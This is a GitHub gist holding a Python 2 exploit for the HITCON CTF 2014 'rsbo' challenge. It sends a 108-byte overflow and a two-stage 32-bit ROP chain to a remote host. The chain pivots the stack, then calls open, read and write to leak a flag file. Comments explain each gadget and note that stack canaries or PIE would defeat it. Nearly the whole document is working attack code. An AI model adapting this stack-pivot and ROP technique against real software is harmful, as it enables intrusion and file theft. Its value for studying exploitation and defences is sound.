@g05u g05u/xpl_rsbo.py
Created Aug 18, 2014

HITCON CTF rsbo exploit
#!/usr/bin/env python
# HITCON CTF "rsbo" exploit: a 32-bit ROP chain delivered over one TCP write.
# The script only builds two byte strings and sends them; every address below
# is a fixed location in the target binary (0x0804xxxx), so the chain uses no
# runtime information leak. Python 2 code (print statement, str payloads).
# `NullSocket` comes from the non-stdlib `nulllife` helper module.
#
# Defender's reading of what the chain depends on: (a) an input of 108 bytes
# reaches the saved return address, (b) code and data live at fixed addresses
# (presumably a non-PIE binary -- inferred from the constants, not shown here),
# (c) the PLT stubs for open/read/write are callable. A stack canary would
# break (a); PIE/ASLR would break (b).
from struct import *
from nulllife import *
new_ebp = 0x0804a100  # writable address the stack is pivoted to; stage 2 is expected to land here
plt_read = 0x080483E0  # PLT stub for read()
plt_open = 0x08048420  # PLT stub for open()
plt_write = 0x08048450  # PLT stub for write()
flag_str = 0x080487D0  # address of a path string inside the binary (its contents are not visible here)
pop2ret = 0x0804879E  # gadget: pop; pop; ret -- discards two dwords (call arguments) then returns
pop3ret = 0x0804879D  # gadget: pop; pop; pop; ret -- one byte before pop2ret, so likely one extra pop
leaveret = 0x08048535  # gadget: leave; ret (mov esp,ebp; pop ebp; ret) -- the stack pivot
read_80_bytes = 0x0804865C  # presumably a routine in the binary that read()s 0x80 bytes into its first argument -- TODO confirm
address_writable = 0x0804a200  # scratch buffer the file contents are read into and written back from
s = NullSocket("210.61.8.96", 51342)
stage1 = "\x00" * 108 #padding to ret: 108 bytes of NUL up to the saved return address
#stage1: pivot stack -- pull stage 2 into memory at new_ebp, then move esp there
stage1 += pack("<I", read_80_bytes) #read: first return target; reads the rest of the payload (stage 2)
stage1 += pack("<I", pop2ret)  # return address for read_80_bytes; pops the two dwords below off the stack
stage1 += pack("<I", 0x0804a100) #address writable -- literal duplicates new_ebp; the read destination
stage1 += pack("<I", new_ebp) #new ebp -- second dword consumed by pop2ret
stage1 += pack("<I", leaveret)  # leave;ret: esp <- ebp, pop ebp, ret; relies on ebp holding new_ebp here -- not verifiable from this script
#stage2: open and read flag (original comment: "open y read flag")
stage2 = pack("<I", 0x41424344)  # "DCBA" filler: consumed by the `pop ebp` of leave;ret, never dereferenced
stage2 += pack("<I", plt_open) #open(flag_str, 0)
stage2 += pack("<I", pop2ret)  # return address for open(): skips the two arguments below
stage2 += pack("<I", flag_str) #flag_string: arg0, path
stage2 += pack("<I", 0) #flag: arg1, flags == 0 (O_RDONLY)
stage2 += pack("<I", plt_read) #read(3, address_writable, 100)
stage2 += pack("<I", pop3ret)  # return address for read(): skips the three arguments below
stage2 += pack("<I", 3) #fd: assumes open() returned the lowest free descriptor after 0/1/2
stage2 += pack("<I", address_writable) #address writable: destination buffer
stage2 += pack("<I", 100) #length
stage2 += pack("<I", plt_write) #write(1, address_writable, 100): sends the buffer back
stage2 += pack("<I", pop3ret)  # return address for write(); nothing meaningful follows, chain ends here
stage2 += pack("<I", 1)  # fd 1 (stdout); presumably the service has the socket on stdout -- TODO confirm
stage2 += pack("<I", address_writable)  # source buffer
stage2 += pack("<I", 100)  # length
payload = stage1 + stage2  # both stages go out in one write; stage 2 is presumably what read_80_bytes consumes
s.write(payload)
print s.readuntil("\x00")  # print whatever write(1, ...) sent back, up to the first NUL byte